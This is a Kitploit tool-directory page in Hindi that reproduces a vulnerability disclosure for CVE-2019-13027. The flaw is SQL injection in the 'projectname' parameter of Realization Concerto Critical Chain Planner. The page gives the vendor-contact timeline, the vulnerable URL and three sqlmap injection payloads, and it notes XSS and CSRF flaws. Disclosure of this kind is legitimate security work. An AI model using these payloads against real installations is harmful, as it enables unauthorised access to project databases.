Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-13027 — CVE-2019-13027 का खुलासा करने के लिए विवरण | Kitploit
उपकरण/GitHubGitHub/ickogz/cve-2019-13027
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubickogz/cve-2019-13027

CVE-2019-13027

CVE-2019-13027 का खुलासा करने के लिए विवरण

रिपॉजिटरी देखें
117 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-13027

CVE-2019-13027 का खुलासा करने के लिए विवरण

विक्रेता संपर्क समयरेखा: 1 जुलाई 2019 -> कोई प्रतिक्रिया नहीं, कोई ईमेल वापस नहीं।

4 जुलाई 2019 -> कोई प्रतिक्रिया नहीं, कोई ईमेल वापस नहीं।

8 जुलाई 2019 -> ईमेल भेजा गया, Github बनाया गया।

11 जुलाई 2019 -> कोई विक्रेता प्रतिक्रिया नहीं। कमजोरी का खुलासा किया गया।

[कमजोरी का प्रकार] SQL इंजेक्शन [प्रभावित उत्पाद कोड बेस] CONCERTO CRITICAL CHAIN PLANNER (CCPM) - संस्करण: 5.10.8071 (5.x शाखा पर अन्य संस्करण शायद प्रभावित हैं। अन्य शाखाओं के साथ परीक्षण नहीं कर सकते)

[प्रभावित घटक] Realization Concerto Critical Chain Planner (उर्फ CCPM) 5.10.8071 में कुछ गंभीर सुरक्षा समस्याएं हैं, कम से कम taskupdt/taskdetails.aspx वेबपेज में "projectname" पैरामीटर के माध्यम से SQL इंजेक्शन है।


[हमले का प्रकार] दूरस्थ

[हमले के वेक्टर] एप्लिकेशन में बहुत सारे रिफ्लेक्टेड XSS/CSRF हैं (उदाहरण के लिए, checklist/checklist में), लेकिन मुश्किल हिस्सा SQL इंजेक्शन है। SQL Server संस्करण और/या IDS/IPS के आधार पर कुछ छेड़छाड़ की आवश्यकता है।

URL: https:/concertoURL/taskupdt/taskdetails.aspx?projectname=foo&taskID=1&uniqueTaskID=2&taskuniqueid=2&reportname=&securitycode=undefined&bIsSubTask=undefined

ProjectName (foo) मौजूद और मान्य होना चाहिए। शेष पैरामीटरों को Fuzz करें (या वास्तविक अनुरोध का उपयोग करें)। foo में भी एक XSS है

पता लगाए गए SQL (SQLMAP से पेलोड) Parameter: projectname (GET)

root@kitploit:~
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: projectname=foo';WAITFOR DELAY '0:0:5'--

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: projectname=foo' AND 3676=3676-- 

Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF)
Payload: projectname=foo' WAITFOR DELAY '0:0:5'-- 

[उत्पाद का विक्रेता] REALIZATION - https://www.realization.com/

टूल डाउनलोड करें